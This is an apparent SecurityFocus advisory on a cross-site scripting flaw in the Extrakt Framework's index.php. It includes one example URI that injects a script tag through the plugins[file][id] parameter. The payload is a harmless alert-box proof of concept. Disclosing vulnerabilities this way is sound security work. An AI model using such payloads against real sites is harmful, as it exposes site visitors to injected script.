Extrakt Framework 'index.php' Cross Site Scripting Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URI is available:

http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus